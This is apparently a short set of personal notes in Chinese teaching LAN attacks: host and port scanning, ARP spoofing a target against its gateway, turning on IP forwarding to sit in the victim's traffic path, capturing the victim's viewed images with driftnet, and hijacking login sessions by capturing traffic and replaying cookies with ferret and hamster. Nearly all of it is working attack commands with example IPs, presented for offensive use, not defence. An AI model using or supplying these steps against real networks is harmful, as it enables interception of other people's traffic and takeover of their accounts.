局域網斷網攻擊
fping -asg 192.168.1.0/24 ##掃描0網段所有能ping通的ip
nmap -Ss 192.168.1.141 ##掃描141主機打開的端口
arp攻擊
arpspoof -i 自己的網卡 -t 目標IP 目標網關
例如:arpspoof -i eth0 -t 192.168.1.100 192.168.1.1
局域網arp欺騙
目標的IP流量經過我的網卡,從網關出去
首先,進行IP流量轉發
echo 1 >/proc/sys/net/ipv4/ip_forward (echo寫命令,是不會有回顯的)
再進行arpspoof命令
arpspoof -i eth0 -t 192.168.1.100 192.168.1.1
此時目標的流量將會經過我的網卡,就成爲了arp欺騙
driftnet ##獲取本機網卡的圖片
因爲目標的流量此時經過我的網卡,所以我獲取本機網卡圖片=獲得目標所瀏覽圖片
會話劫持——登陸別人登錄過的網站
所用軟件:
burpsuite ##抓包改包重放
首先對目標進行arp欺騙,然後用burpsuite進行抓包
當目標登陸了某些網站時,burpsuite上會顯示很多DNS的信息
此時停止抓包,將文件保存爲pcap格式,關閉burpsuite,
進入保存文件的目錄,使用ferret -r 文件名 命令,生成一個.txt的文件;
此時執行hamster命令,會生成一些信息(127.0.0.1:1234)
意思是把代理改爲127.0.0.1的1234端口
然後在瀏覽器輸入127.0.0.1:1234即可看到一個ip,點擊後進入,有很多地址,在其中找到我們需要的即可